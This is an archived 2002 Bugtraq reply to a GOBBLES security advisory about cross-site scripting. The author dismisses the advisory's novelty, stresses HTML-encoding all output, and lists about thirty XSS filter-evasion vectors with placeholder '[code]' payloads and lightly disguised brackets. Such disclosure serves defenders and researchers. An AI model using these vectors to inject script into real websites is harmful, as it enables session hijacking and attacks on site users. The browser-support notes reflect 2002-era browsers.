Bugtraq mailing list archives

Re: GOBBLES SECURITY ADVISORY #33


From: Andrew Clover <and () doxdesk com>
Date: Sat, 11 May 2002 15:04:46 +0000

> Only hotmail security historians like those at GOBBLES Security know of
> obscure feature in JavaScript language that make it easy to bypass thing
> like "<...>", "<script>...</script>", and "javascript:" filter for CSS
> attack using JavaScript.

This is a well-known problem and has been posted to Bugtraq before, eg.:

  http://online.securityfocus.com/archive/1/50782
  http://online.securityfocus.com/archive/1/27386

JavaScript entities were an idiotic mistake, and have not made it into the
ECMAScript spec. Only older Netscapes support them: Netscape 6/Mozilla does
away with them, thankfully. IE has never implemented them.

> Until now, that encoding information was private knowledge of the
> underground.

Oh, puh-lease. Some of us here can actually read RFCs, you know.

> HTML string completion / HTML closure
>
> Doesn't need much coverage since it pretty obvious to anyone with
> rational mind.

Quite so. Doesn't need *any* coverage really. All strings must be
HTML-encoded on output to HTML, and that includes &quot; escaping as
well as &amp;.

Sure, lots of people get this wrong, but then lots of people are idiots,
and even if you understand the issues it's easy to let one vulnerability
slip through. This is not news.

Here is a cut-n-paste collection of typical JavaScript-injection hacks
you may derive some glee from playing with. I've replaced all angle
brackets with double-round-brackets in case any AV software is feeling
particularly sensitive.

  ((a href="javas&#99;ript&#35;[code]"))
  ((div onmouseover="[code]"))
  ((img src="javascript:[code]"))
  ((img dynsrc="javascript:[code]")) [IE]
  ((input type="image" dynsrc="javascript:[code]")) [IE]
  ((bgsound src="javascript:[code]")) [IE]
  &((script))[code]((/script))
  &{[code]}; [N4]
  ((img src=&{[code]};)) [N4]
  ((link rel="stylesheet" href="javascript:[code]"))
  ((iframe src="vbscript:[code]")) [IE]
  ((img src="mocha:[code]")) [N4]
  ((img src="livescript:[code]")) [N4]
  ((a href="about:((s&#99;ript))[code]((/script))"))
  ((meta http-equiv="refresh" content="0;url=javascript:[code]"))
  ((body onload="[code]"))
  ((div style="background-image: url(javascript:[code]);"))
  ((div style="behaviour: url([link to code]);")) [IE]
  ((div style="binding: url([link to code]);")) [Mozilla]
  ((div style="width: expression([code]);")) [IE]
  ((style type="text/javascript"))[code]((/style)) [N4]
  ((object classid="clsid:..." codebase="javascript:[code]")) [IE]
  ((style))((!--((/style))((script))[code]//--))((/script))
  ((![CDATA[((!--]]))((script))[code]//--))((/script))
  ((!-- -- --))((script))[code]((/script))((!-- -- --))
  ((((script))[code]((/script))
  ((img src="blah"onmouseover="[code]"))
  ((img src="blah))" onmouseover="[code]"))
  ((xml src="javascript:[code]"))
  ((xml id="X"))((a))((b))&lt;script))[code]&lt;/script));((/b))((/a))((/xml))
    ((div datafld="b" dataformatas="html" datasrc="#X"))((/div))
  [\xC0][\xBC]script))[code][\xC0][\xBC]/script)) [UTF-8; IE, Opera]

> but there can only be one CSS king, and that king is GOBBLES.

That's nice dear.

-- 
Andrew Clover
mailto:and () doxdesk com
http://and.doxdesk.com/